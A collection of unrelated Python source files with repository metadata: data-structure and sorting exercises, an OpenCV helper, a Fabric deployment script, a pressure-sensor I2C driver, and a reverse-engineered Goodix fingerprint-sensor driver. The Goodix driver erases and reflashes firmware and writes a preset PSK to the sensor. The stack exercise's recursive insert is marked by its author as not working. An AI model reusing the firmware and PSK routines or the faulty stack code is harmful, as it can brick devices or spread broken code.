for a in range(self.height):
if a is not None:
print(a, end=" ")
print()
# Inserting at bottom of stack
# Although that's not a normal operation for stack
# But it's recommended exercise from byte-by-byte for recursion
# Not working properly
def helper(self, curr, a):
if curr.next is None:
t = item(a, None)
curr.next = t
else:
# bottom = curr
self.helper(self, curr.next, a)
def insertBottom(self, a):
curr = self.top
bottom = self.top
self.helper(curr, a)
myStack = stack(None, 1)
for i in range(6):
myStack.pussh(i)
myStack.insertBottom(67)
myStack.iterate()
```
#### File: DS-alogs-practice/sorting/bubbleSort.py
```python
def bubbleSort(box):
for e in range(len(box)):
for i in range(len(box)):
if i+1 < len(box):
if box[i] > box[i+1]:
temp = box[i]
box[i] = box[i+1]
box[i+1] = temp
arr = [29, 64, 73, 34, 20, -9, 23]
bubbleSort(arr)
print(arr)
```
#### File: DS-alogs-practice/sorting/selectionSort.py
```python
def selectionSort(box):
for i in range(len(box)):
mini = i
for j in range(i+1, len(box)):
if box[j] < box[mini]:
mini = j
temp = box[i]
box[i] = box[mini]
box[mini] = temp
arr = [29, 64, 73, 34, 20, -9, 23]
selectionSort(arr)
print(arr)
``` |
{
"source": "807782352/Robomaster-CV",
"score": 3
} |
#### File: Robomaster-CV/RM_CV/myFunc.py
```python
import cv2
def cv_show(name,img):
cv2.imshow(name, img)
cv2.waitKey(0)
cv2.destroyAllWindows()
``` |
{
"source": "8081594571/bgtools_web",
"score": 2
} |
#### File: 8081594571/bgtools_web/fabfile.py
```python
import os
import datetime as dt
from io import StringIO
import json
import posixpath
import fabric
import requests
from fabsettings import (USER, HOST, DJANGO_APP_NAME,
DJANGO_APPS_DIR, LOGS_ROOT_DIR,
APP_PORT, GUNICORN_WORKERS, DJANGO_PROJECT_NAME,
STAGING_APP_PORT)
def upload_template(c, filename, destination, context=None, template_dir=None):
"""
Render and upload a template text file to a remote host.
"""
text = None
template_dir = template_dir or os.getcwd()
from jinja2 import Environment, FileSystemLoader
jenv = Environment(loader=FileSystemLoader(template_dir))
context = context if context is not None else {}
text = jenv.get_template(filename).render(**context)
# Force to a byte representation of Unicode, or str()ification
# within Paramiko's SFTP machinery may cause decode issues for
# truly non-ASCII characters.
# text = text.encode('utf-8')
# Upload the file.
return c.put(
StringIO(text),
destination,
)
def venv(c):
"""
Runs a command in a virtualenv (which has been specified using
the virtualenv context manager
"""
return c.prefix("source {}/bin/activate".format(c.config.bgtools.VENV_DIR))
def install_dependencies(c):
ensure_virtualenv(c)
with venv(c), c.cd(c.config.bgtools.SRC_DIR):
c.run("pip install -U -r requirements.txt")
def file_exists(c, path):
print('checking existence of: {}: {}'.format(path, bool(c.run('stat {}'.format(path), hide=True, warn=True))))
return c.run('stat {}'.format(path), hide=True, warn=True).ok
def ensure_virtualenv(c):
args = c.config.bgtools
ensure_dir(c, args.SRC_DIR)
if file_exists(c, args.VENV_DIR):
return
with c.cd(args.DJANGO_APP_ROOT):
c.run("virtualenv --no-site-packages --python={} {}".format(
args.PYTHON_BIN, args.venv_subdir))
c.run("echo {} > {}/lib/{}/site-packages/projectsource.pth".format(
args.SRC_DIR, args.venv_subdir, args.PYTHON_BIN))
def ensure_dir(c, d):
print('checking existence of {} on {}'.format(d, c))
if not file_exists(c, d):
# note that the parent directory needs to already exist, usually by making a custom app
# with the correct name in the webfaction control panel
print('making {}'.format(d))
c.run("mkdir -p {}".format(d))
def copy_settings(c):
args = c.config.bgtools
with c.cd(args.LOCAL_DIR):
fname = 'settings_{}.py'.format(args.mode)
c.local('cp {} bgtools/bgtools/private_settings.py'.format(fname))
c.local('echo STAGING={} >> bgtools/bgtools/private_settings.py'.format('True' if args.staging else False))
def rsync(c, src, dest):
args = c.config.bgtools
c.local('rsync -avz {} {}:{}'.format(src,
args.host,
dest))
def rsync_source(c):
"""
rsync the source over to the server
"""
args = c.config.bgtools
rsync(c, os.path.join(args.LOCAL_DIR, 'bgtools'), args.DJANGO_APP_ROOT)
def collect_static(c):
"""
Collect django static content on server
"""
with venv(c), c.cd(c.config.bgtools.SRC_DIR):
c.run('python manage.py collectstatic --no-input')
def checkout_and_install_libs(c):
args = c.config.bgtools
libs = json.load(open('libs.json'))
ensure_dir(c, args.CHECKOUT_DIR)
with c.cd(args.CHECKOUT_DIR):
for lib, params in libs.items():
print('handling ' + lib)
libdir = params['repo']
if libdir != 'local':
params['branch'] = args.branch
else:
with c.cd(args.LOCAL_DIR):
rsync(c, posixpath.join(params['path'], params['name']),
args.CHECKOUT_DIR)
with c.cd(params['name']), venv(c):
c.run('pip install -U .')
continue
github_url = 'https://github.com/{}/{}'.format(params['owner'], params['repo'])
if not file_exists(c, libdir):
c.run('git clone {}.git'.format(github_url))
with c.cd(libdir):
c.run('git fetch origin')
if args.mode == 'debug' or args.tag == 'head':
c.run('git checkout {}'.format(params['branch']))
c.run('git pull')
version = c.run('git rev-parse {}'.format(params['branch'])).stdout
version_url = '{}/commits/{}'.format(github_url, version)
elif args.mode == 'release':
tag = args.tag
if tag == 'latest':
tag = c.run('git tag -l "v*" --sort=-v:refname').stdout.split()[0]
c.run('git checkout {}'.format(tag))
version = tag
version_url = '{}/releases/tag/{}'.format(github_url, tag)
for src, target in params.get('extras', []):
with c.cd(args.LOCAL_DIR):
rsync(c, posixpath.join(args.LOCAL_DIR, 'extras', lib, src),
posixpath.join(args.CHECKOUT_DIR, libdir, target))
with venv(c):
c.run('pip install -U .')
with c.cd(args.SRC_DIR):
r = requests.get('https://api.github.com/repos/{}/{}/releases'.format(params['owner'],
params['repo']))
changelog = r.json()
changelog = [{'url': ch['html_url'],
'date': dt.datetime.strptime(ch['published_at'][:10], '%Y-%m-%d').date(),
'name': ch['name'],
'tag': ch['tag_name'],
'description': ch['body']}
for ch in changelog]
for tname, context in [('version', {'version': version, 'url': version_url}),
('changelog', {'changelog': changelog})]:
print('uploading {}_{}.html'.format(lib, tname))
upload_template(c, '{}_template.html'.format(tname),
posixpath.join(args.SRC_DIR,
DJANGO_APP_NAME,
'templates',
DJANGO_APP_NAME,
'{}_{}.html'.format(lib, tname)),
context=context,
template_dir=posixpath.join(args.LOCAL_DIR, 'templates'))
@fabric.task
def stop_webserver(c, mode='debug', tag='latest', staging=True, branch='master'):
"""
Stop the webserver that is running the Django instance
"""
populate_args(c, mode=mode, tag=tag, staging=staging, branch=branch)
c.run("kill $(cat {})".format(c.config.bgtools.GUNICORN_PIDFILE))
def _webserver_command(c):
args = c.config.bgtools
return ('{venv_dir}/bin/gunicorn '
'--error-logfile={error_logfile} '
'--access-logfile={access_logfile} '
'--capture-output '
'-b 127.0.0.1:{port} '
'-D -w {workers} --pid {pidfile} '
'{wsgimodule}:application').format(
**{'venv_dir': args.VENV_DIR,
'pidfile': args.GUNICORN_PIDFILE,
'wsgimodule': args.WSGI_MODULE,
'port': APP_PORT if not args.staging else STAGING_APP_PORT,
'workers': GUNICORN_WORKERS,
'error_logfile': args.GUNICORN_ERROR_LOGFILE,
'access_logfile': args.GUNICORN_ACCESS_LOGFILE}
)
@fabric.task
def start_webserver(c, mode='debug', tag='latest', staging=True, branch='master'):
"""
Starts the webserver that is running the Django instance
"""
populate_args(c, mode=mode, tag=tag, staging=staging, branch=branch)
start_webserver_internal(c)
def start_webserver_internal(c):
print('starting new webserver: "{}"'.format(_webserver_command(c)))
with c.cd(c.config.bgtools.SRC_DIR):
c.run(_webserver_command(c), pty=False, echo=True)
@fabric.task(hosts=[HOST])
def restart_webserver(c, mode=None, tag=None, staging=None, branch=None):
"""
Restarts the webserver that is running the Django instance
"""
populate_args(c, mode=mode, staging=staging, tag=tag, branch=branch)
restart_webserver_internal(c)
def restart_webserver_internal(c):
args = c.config.bgtools
if file_exists(c, args.GUNICORN_PIDFILE):
print('killing existing webserver')
c.run("kill -HUP $(cat {})".format(args.GUNICORN_PIDFILE), echo=True)
else:
start_webserver_internal(c)
def populate_arg(args, existing, argname):
return existing if existing is not None else args[argname]
def populate_args(c, **kwargs):
args = c.config.bgtools
# env.use_ssh_config = True
for k, v in kwargs.items():
print('setting {} to {}'.format(k, populate_arg(args, v, k)))
setattr(args, k, populate_arg(args, v, k))
project = DJANGO_PROJECT_NAME
if args.staging:
project += '_staging'
args.DJANGO_APP_ROOT = posixpath.join(DJANGO_APPS_DIR, project)
# Python version
args.PYTHON_BIN = "python3.5"
# env.PYTHON_PREFIX = "" # e.g. /usr/local Use "" for automatic
# env.PYTHON_FULL_PATH = (posixpath.join(env.PYTHON_PREFIX, 'bin', env.PYTHON_BIN)
# if env.PYTHON_PREFIX else env.PYTHON_BIN)
args.GUNICORN_PIDFILE = posixpath.join(args.DJANGO_APP_ROOT, 'gunicorn.pid')
args.GUNICORN_ERROR_LOGFILE = posixpath.join(LOGS_ROOT_DIR,
'gunicorn_error_{}.log'.format(project))
args.GUNICORN_ACCESS_LOGFILE = posixpath.join(LOGS_ROOT_DIR,
'gunicorn_access_{}.log'.format(project))
args.SRC_DIR = posixpath.join(args.DJANGO_APP_ROOT, DJANGO_PROJECT_NAME)
args.VENV_DIR = posixpath.join(args.DJANGO_APP_ROOT, args.venv_subdir)
args.CHECKOUT_DIR = posixpath.join(args.DJANGO_APP_ROOT, 'checkouts')
args.WSGI_MODULE = '{}.wsgi'.format(DJANGO_PROJECT_NAME)
args.LOCAL_DIR = os.path.dirname(os.path.realpath(__file__))
@fabric.task(hosts=[HOST])
def deploy(c, mode=None, staging=True, tag=None, branch=None):
populate_args(c, mode=mode, staging=staging, tag=tag, branch=branch)
print(c.config.bgtools)
copy_settings(c)
rsync_source(c)
install_dependencies(c)
checkout_and_install_libs(c)
collect_static(c)
restart_webserver_internal(c)
``` |
{
"source": "808brick/KellerLD-python",
"score": 3
} |
#### File: 808brick/KellerLD-python/kellerLD.py
```python
import time
import smbus
import struct
import os
class KellerLD(object):
_SLAVE_ADDRESS = 0x40
_REQUEST_MEASUREMENT = 0xAC
_DEBUG = False
_P_MODES = (
"PA Mode, Vented Gauge", # Zero at atmospheric pressure
"PR Mode, Sealed Gauge", # Zero at 1.0 bar
"PAA Mode, Absolute Gauge" # Zero at vacuum
)
_P_MODE_OFFSETS = (1.01325, 1.0, 0.0)
PRESSURE_CONVERSION = {
"Pa" : 100000,
"mbar" : 1000,
"bar" : 1,
}
def __init__(self, bus=1):
self._bus = None
self._fluid_density = 1029 # kg/m^3
try:
self._bus = smbus.SMBus(bus)
except:
print("Bus %d is not available.") % bus
print("Available busses are listed as /dev/i2c*")
if os.uname()[1] == 'raspberrypi':
print("Enable the i2c interface using raspi-config!")
def init(self):
if self._bus is None:
print("No bus!")
return False
# Read out pressure-mode to determine relevant offset
self._bus.write_byte(self._SLAVE_ADDRESS, 0x12)
time.sleep(0.001)
# read three bytes (status, P MSB, P LSB)
# status byte should be 0b01BMoEXX, where
# B=(0: conversion complete, 1:busy),
# Mo=(00:normal mode, 01:command mode, 1X: reserved)
# E=(0:checksum okay, 1:memory error)
# X=(don't care)
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 3)
scaling0 = data[1] << 8 | data[2]
self.debug(("0x12:", scaling0, data))
pModeID = scaling0 & 0b11
self.pMode = self._P_MODES[pModeID]
self.pModeOffset = self._P_MODE_OFFSETS[pModeID]
self.debug(("pMode", self.pMode, "pressure offset [bar]", self.pModeOffset))
self.year = scaling0 >> 11
self.month = (scaling0 & 0b0000011110000000) >> 7
self.day = (scaling0 & 0b0000000001111100) >> 2
self.debug(("calibration date", self.year, self.month, self.day))
# Read out minimum pressure reading
time.sleep(0.001)
self._bus.write_byte(self._SLAVE_ADDRESS, 0x13)
time.sleep(0.001)
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 3)
MSWord = data[1] << 8 | data[2]
self.debug(("0x13:", MSWord, data))
time.sleep(0.001)
self._bus.write_byte(self._SLAVE_ADDRESS, 0x14)
time.sleep(0.001)
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 3)
LSWord = data[1] << 8 | data[2]
self.debug(("0x14:", LSWord, data))
self.pMin = MSWord << 16 | LSWord
self.debug(("pMin", self.pMin))
# Read out maximum pressure reading
time.sleep(0.001)
self._bus.write_byte(self._SLAVE_ADDRESS, 0x15)
time.sleep(0.001)
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 3)
MSWord = data[1] << 8 | data[2]
self.debug(("0x15:", MSWord, data))
time.sleep(0.001)
self._bus.write_byte(self._SLAVE_ADDRESS, 0x16)
time.sleep(0.001)
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 3)
LSWord = data[1] << 8 | data[2]
self.debug(("0x16:", LSWord, data))
self.pMax = MSWord << 16 | LSWord
self.debug(("pMax", self.pMax))
# 'I' for 32bit unsigned int
self.pMin = struct.unpack('f', struct.pack('I', self.pMin))[0]
self.pMax = struct.unpack('f', struct.pack('I', self.pMax))[0]
self.debug(("pMin:", self.pMin, "pMax:", self.pMax))
return True
def read(self):
if self._bus is None:
print("No bus!")
return False
if self.pMin is None or self.pMax is None:
print("Init required!")
print("Call init() at least one time before attempting to read()")
return False
self._bus.write_byte(self._SLAVE_ADDRESS, self._REQUEST_MEASUREMENT)
time.sleep(0.01) #10 ms, plenty of time according to spec.
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 5)
statusByte = data[0]
pressureRaw = data[1] << 8 | data[2]
temperatureRaw = data[3] << 8 | data[4]
'''
# Always busy for some reason
busy = statusByte & 1 << 5
if busy:
print("Conversion is not complete.")
return
'''
if statusByte & 0b11 << 3 :
print("Invalid mode: %d, expected 0!") % ((statusByte & 0b11 << 3) >> 3)
return False
if statusByte & 1 << 2 :
print("Memory checksum error!")
return False
self._pressure = (pressureRaw - 16384) * (self.pMax - self.pMin) / 32768 + self.pMin + self.pModeOffset
self._temperature = ((temperatureRaw >> 4) - 24) * 0.05 - 50
self._depth = ((self._pressure * self.PRESSURE_CONVERSION["Pa"]) - 101325) / (self._fluid_density * 9.80665)
self._altitude = (1-((self._pressure * self.PRESSURE_CONVERSION["mbar"] / 1013.25)**0.190284)) * 145366.45 * .3048
self.debug(("data:", data))
self.debug(("pressureRaw:", pressureRaw, "pressure:", self._pressure))
self.debug(("temperatureRaw", temperatureRaw, "temperature:", self._temperature))
self.debug(("depth:", self._depth))
self.debug(("altitude:", self._altitude))
return True
def set_fluid_density(self, fluid_density):
'''
Provide the density of the working fluid in kg/m^3. Default is for
seawater. Should be 997 for freshwater.
'''
self._fluid_density = fluid_density
return True
def temperature(self):
if self._temperature is None:
print("Call read() first to get a measurement")
return
return self._temperature
def pressure(self, conversion = "bar"):
assert self.PRESSURE_CONVERSION.get(conversion) is not None, "Invalid Pressure Unit: {}".format(conversion)
if self._pressure is None:
print("Call read() first to get a measurement")
return
return self._pressure * self.PRESSURE_CONVERSION[conversion]
def depth(self):
if self._depth is None:
print("Call read() first to get a measurement")
return
return self._depth
def altitude(self):
if self._altitude is None:
print("Call read() first to get a measurement")
return
return self._altitude
def debug(self, msg):
if self._DEBUG:
print(msg)
def __str__(self):
return ("Keller LD I2C Pressure/Temperature Transmitter\n" +
"\ttype: {}\n".format(self.pMode) +
"\tcalibration date: {}-{}-{}\n".format(self.year, self.month, self.day) +
"\tpressure offset: {:.5f} bar\n".format(self.pModeOffset) +
"\tminimum pressure: {:.5f} bar\n".format(self.pMin) +
"\tmaximum pressure: {:.5f} bar".format(self.pMax))
if __name__ == '__main__':
sensor = KellerLD()
if not sensor.init():
print("Failed to initialize Keller LD sensor!")
exit(1)
print(sensor)
while True:
try:
sensor.read()
print("pressure: %7.4f bar\ttemperature: %0.2f C") % (sensor.pressure(), sensor.temperature())
time.sleep(0.001)
except Exception as e:
print(e)
``` |
{
"source": "80avin/goodix-fp-dump",
"score": 2
} |
#### File: 80avin/goodix-fp-dump/driver_511.py
```python
from random import randint
from re import fullmatch
from socket import socket
from subprocess import PIPE, STDOUT, Popen
from time import sleep
from typing import List
from crcmod.predefined import mkCrcFun
from goodix import (FLAGS_TRANSPORT_LAYER_SECURITY, Device, check_message_pack,
decode_image, encode_message_pack)
TARGET_FIRMWARE: str = "GF_ST411SEC_APP_12109"
IAP_FIRMWARE: str = "MILAN_ST411SEC_IAP_12101"
VALID_FIRMWARE: str = "GF_ST411SEC_APP_121[0-9]{2}"
PSK: bytes = bytes.fromhex(
"0000000000000000000000000000000000000000000000000000000000000000")
PSK_WHITE_BOX: bytes = bytes.fromhex(
"ec35ae3abb45ed3f12c4751f1e5c2cc05b3c5452e9104d9f2a3118644f37a04b"
"6fd66b1d97cf80f1345f76c84f03ff30bb51bf308f2a9875c41e6592cd2a2f9e"
"60809b17b5316037b69bb2fa5d4c8ac31edb3394046ec06bbdacc57da6a756c5")
PMK_HASH: bytes = bytes.fromhex(
"ba1a86037c1d3c71c3af344955bd69a9a9861d9e911fa24985b677e8dbd72d43")
DEVICE_CONFIG: bytes = bytes.fromhex(
"701160712c9d2cc91ce518fd00fd00fd03ba000180ca000400840015b3860000"
"c4880000ba8a0000b28c0000aa8e0000c19000bbbb9200b1b1940000a8960000"
"b6980000009a000000d2000000d4000000d6000000d800000050000105d00000"
"00700000007200785674003412200010402a0102042200012024003200800001"
"005c008000560004205800030232000c02660003007c000058820080152a0182"
"032200012024001400800001005c000001560004205800030232000c02660003"
"007c0000588200801f2a0108005c008000540010016200040364001900660003"
"007c0001582a0108005c0000015200080054000001660003007c00015800892e")
SENSOR_WIDTH = 80
SENSOR_HEIGHT = 88
def warning(text: str) -> str:
decorator = "#" * len(max(text.split("\n"), key=len))
return f"\033[31;5m{decorator}\n{text}\n{decorator}\033[0m"
def check_psk(device: Device, tries: int = 2) -> bool:
for _ in range(tries):
reply = device.preset_psk_read_r(0xbb020003)
if not reply[0]:
raise ValueError("Failed to read PSK")
if reply[1] != 0xbb020003:
raise ValueError("Invalid flags")
if reply[2] == PMK_HASH:
return True
return False
def erase_firmware(device: Device) -> None:
device.mcu_erase_app(0)
device.wait_disconnect()
def write_firmware(device: Device,
offset: int,
payload: bytes,
tries: int = 2) -> None:
for _ in range(tries):
if device.write_firmware(offset, payload):
return
raise ValueError("Failed to write firmware")
def update_firmware(device: Device,
path: str = "firmware/511",
tries: int = 2) -> None:
try:
for _ in range(tries):
firmware_file = open(f"{path}/{TARGET_FIRMWARE}.bin", "rb")
firmware = firmware_file.read()
firmware_file.close()
length = len(firmware)
for i in range(0, length, 1008):
write_firmware(device, i, firmware[i:i + 1008])
if device.check_firmware(0, length,
mkCrcFun("crc-32-mpeg")(firmware)):
device.reset(False, True, 20)
device.wait_disconnect()
return
raise ValueError("Failed to update firmware")
except Exception as error:
print(
warning(f"The program went into serious problems while trying to "
f"update the firmware: {error}"))
erase_firmware(device)
raise error
def setup_device(device: Device) -> None:
if not device.reset(True, False, 20)[0]:
raise ValueError("Reset failed")
device.read_sensor_register(0x0000, 4) # Read chip ID (0x2504)
device.read_otp()
# OTP 0: 0x5332383733342e0032778aa2d495ca055107050a7d0bfd274103110cf17f800c38813034a57f5ef406c4bd4201bdb7b9b7b7b7b9b7b73230a55a5ea1850cfd71
# OTP 1: 0x5332423937332e000a777aa3452cec02510705027d4bd5274103d10cf18f700c38c13033a58f5ff407f48e71018eb6b7b6b6b6b7b6b63450a55a5fa0c814d548
# OTP 0 cp data: 0x5332383733342e0032778aa57f5ef4, CRC checksum: 133
# OTP 1 cp data: 0x5332423937332e000a777aa58f5ff4
# OTP 0 mt data: 0x7d0bfd274103110c7f800c3881303406c4bd4201bdb7b9b7b73230, CRC checksum: 113
# OTP 1 mt data: 0x7d4bd5274103d10c8f700c38c1303307f48e71018eb6b7b6b63450
# OTP 0 ft data: 0xa2d495ca055107050af1b7b9b7b7a55a5ea1fd, CRC checksum: 12
# OTP 1 ft data: 0xa3452cec0251070502f1b6b7b6b6b6b7b6b6d5
if not device.reset(True, False, 20)[0]:
raise ValueError("Reset failed")
device.mcu_switch_to_idle_mode(20)
# From OTP 0 : DAC0=0xb78, DAC1=0xb9, DAC2=0xb7, DAC3=0xb7, 0xb7b9b7b7
# From OTP 1 : DAC0=0xb68, DAC1=0xb7, DAC2=0xb6, DAC3=0xb6, 0xb6b7b6b6
device.write_sensor_register(0x0220, b"\x78\x0b") # DAC0=0xb78
device.write_sensor_register(0x0236, b"\xb9\x00") # DAC1=0xb9
device.write_sensor_register(0x0238, b"\xb7\x00") # DAC2=0xb7
device.write_sensor_register(0x023a, b"\xb7\x00") # DAC3=0xb7
if not device.upload_config_mcu(DEVICE_CONFIG):
raise ValueError("Failed to upload config")
if not device.set_powerdown_scan_frequency(100):
raise ValueError("Failed to set powerdown scan frequency")
def connect_device(device: Device, tls_client: socket) -> None:
tls_client.sendall(device.request_tls_connection())
device.write(
encode_message_pack(tls_client.recv(1024),
FLAGS_TRANSPORT_LAYER_SECURITY))
tls_client.sendall(
check_message_pack(device.read(), FLAGS_TRANSPORT_LAYER_SECURITY))
tls_client.sendall(
check_message_pack(device.read(), FLAGS_TRANSPORT_LAYER_SECURITY))
tls_client.sendall(
check_message_pack(device.read(), FLAGS_TRANSPORT_LAYER_SECURITY))
device.write(
encode_message_pack(tls_client.recv(1024),
FLAGS_TRANSPORT_LAYER_SECURITY))
sleep(0.01) # Important otherwise an USBTimeout error occur
device.tls_successfully_established()
device.query_mcu_state()
def get_image(device: Device, tls_client: socket, tls_server: Popen) -> None:
# while (local_18 < 0x18) {
# (uint16 *)(&DAT_18053d1e8)[local_17 * 2] =
# (uint16 *)(param_1)[local_18] >> 1) << 8) +
# (uint16 *)(param_1)[local_18] >> 1);
# local_17 = local_17 + 1;
# local_18 = local_18 + 2;
# }
device.mcu_switch_to_fdt_mode(
b"\x0d\x01\xae\xae\xbf\xbf\xa4\xa4\xb8\xb8\xa8\xa8\xb7\xb7")
device.nav_0()
device.mcu_switch_to_fdt_mode(
b"\x0d\x01\x80\xaf\x80\xbf\x80\xa3\x80\xb7\x80\xa7\x80\xb6")
device.read_sensor_register(0x0082, 2)
tls_client.sendall(device.mcu_get_image())
write_pgm(decode_image(tls_server.stdout.read(10573)[8:-5]), "clear.pgm")
device.mcu_switch_to_fdt_mode(
b"\x0d\x01\x80\xaf\x80\xbf\x80\xa4\x80\xb8\x80\xa8\x80\xb7")
print("Waiting for finger...")
device.mcu_switch_to_fdt_down(
b"\x0c\x01\x80\xaf\x80\xbf\x80\xa4\x80\xb8\x80\xa8\x80\xb7")
tls_client.sendall(device.mcu_get_image())
write_pgm(decode_image(tls_server.stdout.read(10573)[8:-5]),
"fingerprint.pgm")
def write_pgm(image: List[int], file_name: str) -> None:
file = open(file_name, "w")
file.write(f"P2\n{SENSOR_HEIGHT} {SENSOR_WIDTH}\n4095\n")
file.write("\n".join(map(str, image)))
file.close()
def run_driver(device: Device):
tls_server = Popen([
"openssl", "s_server", "-nocert", "-psk",
PSK.hex(), "-port", "4433", "-quiet"
],
stdout=PIPE,
stderr=STDOUT)
try:
setup_device(device)
tls_client = socket()
tls_client.connect(("localhost", 4433))
try:
connect_device(device, tls_client)
get_image(device, tls_client, tls_server)
finally:
tls_client.close()
finally:
tls_server.terminate()
def main(product: int) -> None:
print(
warning("This program might break your device.\n"
"Consider that it may flash the device firmware.\n"
"Continue at your own risk.\n"
"But don't hold us responsible if your device is broken!\n"
"Don't run this program as part of a regular process"))
code = randint(0, 9999)
if input(f"Type {code} to continue and confirm that you are not a bot: "
) == f"{code}":
previous_firmware = None
while True:
device = Device(product)
device.nop()
device.enable_chip(True)
device.nop()
firmware = device.firmware_version()
print(f"Firmware: {firmware}")
valid_psk = check_psk(device)
print(f"Valid PSK: {valid_psk}")
if firmware == previous_firmware:
raise ValueError("Unchanged firmware")
previous_firmware = firmware
if fullmatch(TARGET_FIRMWARE, firmware):
if not valid_psk:
erase_firmware(device)
continue
run_driver(device)
return
if fullmatch(VALID_FIRMWARE, firmware):
erase_firmware(device)
continue
if fullmatch(IAP_FIRMWARE, firmware):
if not valid_psk:
if not device.preset_psk_write_r(0xbb010003, PSK_WHITE_BOX):
raise ValueError("PSK write failed")
if not check_psk(device):
raise ValueError("Unchanged PSK")
update_firmware(device)
continue
raise ValueError(
"Invalid firmware\n" +
warning("Please consider that removing this security "
"is a very bad idea!"))
```
#### File: 80avin/goodix-fp-dump/goodix.py
```python
from struct import pack as encode
from struct import unpack as decode
from sys import version_info
from time import sleep, time
from typing import List, Literal, Optional, Tuple, Union
from usb.control import get_status
from usb.core import Device as USBDevice
from usb.core import USBError, USBTimeoutError, find
from usb.legacy import (CLASS_DATA, CLASS_VENDOR_SPEC, ENDPOINT_IN,
ENDPOINT_OUT, ENDPOINT_TYPE_BULK)
from usb.util import endpoint_direction, endpoint_type, find_descriptor
if version_info < (3, 8):
raise SystemError("This program require Python 3.8 or newer")
FLAGS_MESSAGE_PROTOCOL: Literal[0xa0] = 0xa0
FLAGS_TRANSPORT_LAYER_SECURITY: Literal[0xb0] = 0xb0
COMMAND_NOP: Literal[0x00] = 0x00
COMMAND_MCU_GET_IMAGE: Literal[0x20] = 0x20
COMMAND_MCU_SWITCH_TO_FDT_DOWN: Literal[0x32] = 0x32
COMMAND_MCU_SWITCH_TO_FDT_UP: Literal[0x34] = 0x34
COMMAND_MCU_SWITCH_TO_FDT_MODE: Literal[0x36] = 0x36
COMMAND_NAV_0: Literal[0x50] = 0x50
COMMAND_MCU_SWITCH_TO_IDLE_MODE: Literal[0x70] = 0x70
COMMAND_WRITE_SENSOR_REGISTER: Literal[0x80] = 0x80
COMMAND_READ_SENSOR_REGISTER: Literal[0x82] = 0x82
COMMAND_UPLOAD_CONFIG_MCU: Literal[0x90] = 0x90
COMMAND_SET_POWERDOWN_SCAN_FREQUENCY: Literal[0x94] = 0x94
COMMAND_ENABLE_CHIP: Literal[0x96] = 0x96
COMMAND_RESET: Literal[0xa2] = 0xa2
COMMAND_MCU_ERASE_APP: Literal[0xa4] = 0xa4
COMMAND_READ_OTP: Literal[0xa6] = 0xa6
COMMAND_FIRMWARE_VERSION: Literal[0xa8] = 0xa8
COMMAND_QUERY_MCU_STATE: Literal[0xae] = 0xae
COMMAND_ACK: Literal[0xb0] = 0xb0
COMMAND_REQUEST_TLS_CONNECTION: Literal[0xd0] = 0xd0
COMMAND_TLS_SUCCESSFULLY_ESTABLISHED: Literal[0xd4] = 0xd4
COMMAND_PRESET_PSK_WRITE_R: Literal[0xe0] = 0xe0
COMMAND_PRESET_PSK_READ_R: Literal[0xe4] = 0xe4
COMMAND_WRITE_FIRMWARE: Literal[0xf0] = 0xf0
COMMAND_READ_FIRMWARE: Literal[0xf2] = 0xf2
COMMAND_CHECK_FIRMWARE: Literal[0xf4] = 0xf4
COMMAND_GET_IAP_VERSION: Literal[0xf6] = 0xf6
def encode_command(cmd0: int, cmd1: int) -> int:
return cmd0 << 4 | cmd1 << 1
def decode_command(command: int) -> Tuple[int, int]:
if command & 0x1:
raise ValueError("Invalid command")
return command >> 4 & 0xf, command >> 1 & 0x7
def encode_message_pack(payload: bytes,
flags: int = FLAGS_MESSAGE_PROTOCOL,
length: Optional[int] = None) -> bytes:
if length is None:
length = len(payload)
data = b""
data += encode("<B", flags)
data += encode("<H", length)
data += encode("<B", sum(data) & 0xff)
data += payload
return data
def decode_message_pack(data: bytes) -> Tuple[bytes, int, int]:
length = decode("<H", data[1:3])[0]
if sum(data[0:3]) & 0xff != data[3]:
raise ValueError("Invalid data")
return data[4:4 + length], data[0], length
def check_message_pack(data: bytes,
flags: int = FLAGS_MESSAGE_PROTOCOL) -> bytes:
data = decode_message_pack(data)
if data[1] != flags or len(data[0]) < data[2]:
raise ValueError("Invalid message pack")
return data[0]
def encode_message_protocol(payload: bytes,
command: int,
length: Optional[int] = None,
checksum: bool = True) -> bytes:
if length is None:
length = len(payload)
data = b""
data += encode("<B", command)
data += encode("<H", length + 1)
data += payload
data += encode("<B", 0xaa - sum(data) & 0xff if checksum else 0x88)
return data
def decode_message_protocol(data: bytes,
checksum: bool = True) -> Tuple[bytes, int, int]:
length = decode("<H", data[1:3])[0]
if checksum:
if data[2 + length] != 0xaa - sum(data[0:2 + length]) & 0xff:
raise ValueError("Invalid data")
elif data[2 + length] != 0x88:
raise ValueError("Invalid data")
return data[3:2 + length], data[0], length - 1
def check_message_protocol(data: bytes,
command: int,
checksum: bool = True) -> bytes:
data = decode_message_protocol(data, checksum)
if data[1] != command or len(data[0]) < data[2]:
raise ValueError("Invalid message protocol")
return data[0]
def decode_ack(data: bytes) -> Tuple[int, bool]:
if not data[1] & 0x1:
raise ValueError("Invalid data")
return data[0], data[1] & 0x2 == 0x2
def check_ack(data: bytes, command: int) -> bool:
data = decode_ack(data)
if data[0] != command:
raise ValueError("Invalid ack")
return data[1]
def decode_image(data: bytes) -> List[int]:
image = []
for i in range(0, len(data), 6):
chunk = data[i:i + 6]
image.append(((chunk[0] & 0xf) << 8) + chunk[1])
image.append((chunk[3] << 4) + (chunk[0] >> 4))
image.append(((chunk[5] & 0xf) << 8) + chunk[2])
image.append((chunk[4] << 4) + (chunk[5] >> 4))
return image
def decode_mcu_state(
data: bytes) -> Tuple[int, bool, bool, bool, int, int, int, int, int]:
return data[0], data[1] & 0x1 == 0x1, data[
1] & 0x2 == 0x2, data[1] & 0x4 == 0x4, data[2] >> 4, data[9], decode(
"<H", data[10:11]), data[12], data[13]
class Device:
def __init__(self, product: int, timeout: Optional[float] = 5) -> None:
print(f"__init__({product}, {timeout})")
if timeout is not None:
timeout += time()
while True:
device = find(idVendor=0x27c6, idProduct=product)
if device is not None:
try:
get_status(device)
break
except USBError as error:
if (error.backend_error_code != -1 and
error.backend_error_code != -4):
raise error
if timeout is not None and time() > timeout:
if device is None:
raise USBTimeoutError("Device not found", -5, 19)
raise USBTimeoutError("Invalid device state", -12, 131)
sleep(0.01)
